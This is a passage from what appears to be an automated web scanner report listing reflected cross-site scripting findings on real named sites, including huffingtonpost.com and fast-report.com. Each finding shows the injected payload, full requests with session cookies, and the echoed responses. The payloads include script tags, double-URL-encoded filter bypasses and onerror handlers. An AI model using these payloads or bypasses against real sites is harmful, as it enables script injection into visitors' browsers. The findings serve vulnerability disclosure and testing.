The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acc64"><script>alert(1)</script>1a393b12c55 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mediaacc64"><script>alert(1)</script>1a393b12c55/citysbest-min.css?58 HTTP/1.1
Host: www.citysbest.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:35 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Content-Length: 17455
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
<meta property="og:url" content="http://www.citysbest.com/mediaacc64"><script>alert(1)</script>1a393b12c55/citysbest-min.css?58"/>
...[SNIP]...

5.70. http://www.citysbest.com/media/citysbest-min.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.citysbest.com
Path:   /media/citysbest-min.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ea01%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e71724f793f was submitted in the REST URL parameter 1. This input was echoed as 3ea01</script><script>alert(1)</script>71724f793f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /media3ea01%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e71724f793f/citysbest-min.css?58 HTTP/1.1
Host: www.citysbest.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:57 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Content-Length: 17806
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
265.pfxID="acg";
s_265.pageName=s_265.pfxID+" : "+pageName;
s_265.channel="us.citybest";
s_265.linkInternalFilters="javascript:,citysbest.com";

var isCity = "";
s_265.prop1= isCity !='' ? "media3ea01</script><script>alert(1)</script>71724f793f" : "national";

var isUrl2 = "citysbest-min.css";
s_265.prop2= isUrl2 != ''? "citysbest-min.css" :"main";

s_265.prop12=document.URL.split('?')[0];
s_265.events="";
s_265.products="";
//s_265.
...[SNIP]...

5.71. http://www.citysbest.com/media/citysbest-min.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.citysbest.com
Path:   /media/citysbest-min.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4250"><script>alert(1)</script>9381a402f46 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/citysbest-min.cssf4250"><script>alert(1)</script>9381a402f46?58 HTTP/1.1
Host: www.citysbest.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:37:19 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Content-Length: 17178
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
<meta property="og:url" content="http://www.citysbest.com/media/citysbest-min.cssf4250"><script>alert(1)</script>9381a402f46?58"/>
...[SNIP]...

5.72. http://www.citysbest.com/media/citysbest-min.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.citysbest.com
Path:   /media/citysbest-min.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af55b%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee29e0ad3a2 was submitted in the REST URL parameter 2. This input was echoed as af55b</script><script>alert(1)</script>e29e0ad3a2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /media/citysbest-min.cssaf55b%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee29e0ad3a2?58 HTTP/1.1
Host: www.citysbest.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:37:37 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Content-Length: 17387
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
+pageName;
s_265.channel="us.citybest";
s_265.linkInternalFilters="javascript:,citysbest.com";

var isCity = "";
s_265.prop1= isCity !='' ? "media" : "national";

var isUrl2 = "citysbest-min.cssaf55b</script><script>alert(1)</script>e29e0ad3a2";
s_265.prop2= isUrl2 != ''? "citysbest-min.cssaf55b</script>
...[SNIP]...

5.73. http://www.citysbest.com/traffic/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.citysbest.com
Path:   /traffic/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebc31"><script>alert(1)</script>9a5275880b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /trafficebc31"><script>alert(1)</script>9a5275880b0/?t=js&bv=&os=&tz=&lg=&rv=&rsv=&pw=%2F%3Ficid%3Dnavbar_citysbest_main5%2F&cb=1081493718 HTTP/1.1
Host: www.citysbest.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; s_pers=%20s_getnr%3D1301171827082-New%7C1364243827082%3B%20s_nrgvo%3DNew%7C1364243827091%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:59 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Content-Length: 17745
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
<meta property="og:url" content="http://www.citysbest.com/trafficebc31"><script>alert(1)</script>9a5275880b0/?t=js&bv=&os=&tz=&lg=&rv=&rsv=&pw=%2F%3Ficid%3Dnavbar_citysbest_main5%2F&cb=1081493718"/>
...[SNIP]...

5.74. http://www.citysbest.com/traffic/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.citysbest.com
Path:   /traffic/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55d03%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9c9e0bcf83e was submitted in the REST URL parameter 1. This input was echoed as 55d03</script><script>alert(1)</script>9c9e0bcf83e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /traffic55d03%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9c9e0bcf83e/?t=js&bv=&os=&tz=&lg=&rv=&rsv=&pw=%2F%3Ficid%3Dnavbar_citysbest_main5%2F&cb=1081493718 HTTP/1.1
Host: www.citysbest.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; s_pers=%20s_getnr%3D1301171827082-New%7C1364243827082%3B%20s_nrgvo%3DNew%7C1364243827091%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:37:19 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Content-Length: 18075
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
5.pfxID="acg";
s_265.pageName=s_265.pfxID+" : "+pageName;
s_265.channel="us.citybest";
s_265.linkInternalFilters="javascript:,citysbest.com";

var isCity = "";
s_265.prop1= isCity !='' ? "traffic55d03</script><script>alert(1)</script>9c9e0bcf83e" : "national";

var isUrl2 = "";
s_265.prop2= isUrl2 != ''? "" :"main";

s_265.prop12=document.URL.split('?')[0];
s_265.events="";
s_265.products="";
//s_265.purchaseID=Math.ceil(Math.random()
...[SNIP]...

5.75. http://www.fast-report.com/bitrix/redirect.php [goto parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fast-report.com
Path:   /bitrix/redirect.php

Issue detail

The value of the goto request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3f0b1'style%3d'x%3aexpression(alert(1))'8b36f925f23 was submitted in the goto parameter. This input was echoed as 3f0b1'style='x:expression(alert(1))'8b36f925f23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /bitrix/redirect.php?event1=shareit_out&event2=FastReport.Net%20Basic%20Edition%20Single&goto=3f0b1'style%3d'x%3aexpression(alert(1))'8b36f925f23 HTTP/1.1
Host: www.fast-report.com
Proxy-Connection: keep-alive
Referer: http://www.fast-report.com/en/buy/order-FASTREPORT.NET.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9371061dd45cfcf52f2cdac620e620ab; BITRIX_SM_GUEST_ID=4619667; BITRIX_SM_LAST_VISIT=26.03.2011+11%3A30%3A45

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 16:34:45 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Set-Cookie: trl_ref=http%3A%2F%2Fwww.fast-report.com%2Fen%2Fbuy%2Forder-FASTREPORT.NET.html; expires=Tue, 05-Apr-2011 16:34:46 GMT
P3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
X-Powered-CMS: Bitrix Site Manager (f6aa359040bb2b476191c7302c607251)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: BITRIX_SM_GUEST_ID=4619667; expires=Tue, 20-Mar-2012 16:34:50 GMT; path=/
Set-Cookie: BITRIX_SM_LAST_VISIT=26.03.2011+11%3A34%3A50; expires=Tue, 20-Mar-2012 16:34:50 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 38534

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://www.fast-report.com/bitrix/rss.php?ID=18&
...[SNIP]...
<input type='hidden' name='backurl' value='/bitrix/3f0b1'style='x:expression(alert(1))'8b36f925f23'>
...[SNIP]...

5.76. http://www.fast-report.com/bitrix/redirect2.php [goto parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fast-report.com
Path:   /bitrix/redirect2.php

Issue detail

The value of the goto request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e9fb"><script>alert(1)</script>ec45f26fc89 was submitted in the goto parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bitrix/redirect2.php?event1=avangate_out&event2=FastReport.Net%20Basic%20Edition%20Single&goto=https%3A%2F%2Fsecure.avangate.com%2Forder%2Fcart.php%3FPRODS%3D1523013%26QTY%3D1%26GID%3D%23EVENT_GID%238e9fb"><script>alert(1)</script>ec45f26fc89 HTTP/1.1
Host: www.fast-report.com
Proxy-Connection: keep-alive
Referer: http://www.fast-report.com/en/buy/order-FASTREPORT.NET.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9371061dd45cfcf52f2cdac620e620ab; BITRIX_SM_GUEST_ID=4619667; BITRIX_SM_LAST_VISIT=26.03.2011+11%3A30%3A38

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 16:32:29 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-Powered-By: PHP/5.3.3
P3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
X-Powered-CMS: Bitrix Site Manager (f6aa359040bb2b476191c7302c607251)
Pragma: no-cache
Set-Cookie: BITRIX_SM_GUEST_ID=4619667; expires=Tue, 20-Mar-2012 16:32:33 GMT; path=/
Set-Cookie: BITRIX_SM_LAST_VISIT=26.03.2011+11%3A32%3A33; expires=Tue, 20-Mar-2012 16:32:33 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 406

<html><head><script language="JavaScript1.1" type="text/javascript">function rd(){b_form.submit();}</script></head><body onload="rd();"><form name="b_form" action="redirect3.php" method=get><input type=hidden name=GOTO value="https://secure.avangate.com/order/cart.php?PRODS=1523013&QTY=1&GID=BITRIX_SM.NzAwMjg4MC40NjE5NjY3Lk4wLi4uZW4=8e9fb"><script>alert(1)</script>ec45f26fc89">
...[SNIP]...

5.77. http://www.fast-report.com/bitrix/redirect2.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fast-report.com
Path:   /bitrix/redirect2.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c05f1"><script>alert(1)</script>c0e1758ffb3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bitrix/redirect2.php?event1=avangate_out&event2=FastReport.Net%20Basic%20Edition%20Single&goto=https%3A%2F%2Fsecure.avangate.com%2Forder%2Fcart.php%3FPRODS%3D1523013%26QTY%3D1%26GID%3D%23EVENT_GI/c05f1"><script>alert(1)</script>c0e1758ffb3D%23 HTTP/1.1
Host: www.fast-report.com
Proxy-Connection: keep-alive
Referer: http://www.fast-report.com/en/buy/order-FASTREPORT.NET.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9371061dd45cfcf52f2cdac620e620ab; BITRIX_SM_GUEST_ID=4619667; BITRIX_SM_LAST_VISIT=26.03.2011+11%3A30%3A38

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 16:32:37 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-Powered-By: PHP/5.3.3
P3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
X-Powered-CMS: Bitrix Site Manager (f6aa359040bb2b476191c7302c607251)
Pragma: no-cache
Set-Cookie: BITRIX_SM_GUEST_ID=4619667; expires=Tue, 20-Mar-2012 16:32:41 GMT; path=/
Set-Cookie: BITRIX_SM_LAST_VISIT=26.03.2011+11%3A32%3A41; expires=Tue, 20-Mar-2012 16:32:41 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 376

<html><head><script language="JavaScript1.1" type="text/javascript">function rd(){b_form.submit();}</script></head><body onload="rd();"><form name="b_form" action="redirect3.php" method=get><input type=hidden name=GOTO value="https://secure.avangate.com/order/cart.php?PRODS=1523013&QTY=1&GID=#EVENT_GI/c05f1"><script>alert(1)</script>c0e1758ffb3D#">
...[SNIP]...

5.78. http://www.huffingtonpost.com/badge/badges_json_v2.php [cb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /badge/badges_json_v2.php

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload e5209<script>alert(1)</script>5ce65e42038 was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /badge/badges_json_v2.php?sn=facebook_glamorous,retweet_glamorous,email_glamorous,comment_glamorous&gn=window.Badges_216861968_1&eu=http%3A//www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html&id=840995&eco=1301155920&ebi2&entry_design=&cb=window.Badges_216861968_1.slicesCallbacke5209<script>alert(1)</script>5ce65e42038&ng=0 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1300987757.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1364029523-1300987777508; __qseg=Q_D|Q_T|Q_2687|Q_2685|Q_2402|Q_1910|Q_1908|Q_1905|Q_1592|Q_683|Q_682|Q_680|Q_679|Q_678|Q_677|Q_676|Q_666|Q_665|Q_660|Q_657; huffpost_adssale=y; s_pers=%20s_getnr%3D1301171811856-Repeat%7C1364243811856%3B%20s_nrgvo%3DRepeat%7C1364243811860%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; huffpo_type_views=%7B%222%22%3A1%7D; __utma=265287574.492257335.1300987757.1300987757.1301171812.2; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.2.10.1301171812

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sat, 26 Mar 2011 20:36:19 GMT
Content-Length: 7536
Connection: close

window.Badges_216861968_1.slicesCallbacke5209<script>alert(1)</script>5ce65e42038({"slice_names":["facebook_glamorous","retweet_glamorous","email_glamorous","comment_glamorous"],"global_name":"window.Badges_216861968_1","slice_params":{"facebook_glamorous":{"share_amount":"3,283"},
...[SNIP]...

5.79. http://www.huffingtonpost.com/badge/badges_json_v2.php [gn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /badge/badges_json_v2.php

Issue detail

The value of the gn request parameter is copied into the HTML document as plain text between tags. The payload 10a73<img%20src%3da%20onerror%3dalert(1)>afed2c094bf was submitted in the gn parameter. This input was echoed as 10a73<img src=a onerror=alert(1)>afed2c094bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /badge/badges_json_v2.php?sn=facebook_glamorous,retweet_glamorous,email_glamorous,comment_glamorous&gn=window.Badges_216861968_110a73<img%20src%3da%20onerror%3dalert(1)>afed2c094bf&eu=http%3A//www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html&id=840995&eco=1301155920&ebi2&entry_design=&cb=window.Badges_216861968_1.slicesCallback&ng=0 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1300987757.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1364029523-1300987777508; __qseg=Q_D|Q_T|Q_2687|Q_2685|Q_2402|Q_1910|Q_1908|Q_1905|Q_1592|Q_683|Q_682|Q_680|Q_679|Q_678|Q_677|Q_676|Q_666|Q_665|Q_660|Q_657; huffpost_adssale=y; s_pers=%20s_getnr%3D1301171811856-Repeat%7C1364243811856%3B%20s_nrgvo%3DRepeat%7C1364243811860%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; huffpo_type_views=%7B%222%22%3A1%7D; __utma=265287574.492257335.1300987757.1300987757.1301171812.2; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.2.10.1301171812

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sat, 26 Mar 2011 20:36:18 GMT
Content-Length: 7539
Connection: close

window.Badges_216861968_1.slicesCallback({"slice_names":["facebook_glamorous","retweet_glamorous","email_glamorous","comment_glamorous"],"global_name":"window.Badges_216861968_110a73<img src=a onerror=alert(1)>afed2c094bf","slice_params":{"facebook_glamorous":{"share_amount":"3,283"},"retweet_glamorous":{"short_url":"http:\/\/huff.to\/hL3Bum","tweet_text":"BREAKING: Geraldine Ferraro passes away at 75","views_amount":"
...[SNIP]...

5.80. http://www.huffingtonpost.com/badge/badges_json_v2.php [sn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /badge/badges_json_v2.php

Issue detail

The value of the sn request parameter is copied into the HTML document as plain text between tags. The payload d63f1<img%20src%3da%20onerror%3dalert(1)>fdda9b0981e was submitted in the sn parameter. This input was echoed as d63f1<img src=a onerror=alert(1)>fdda9b0981e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

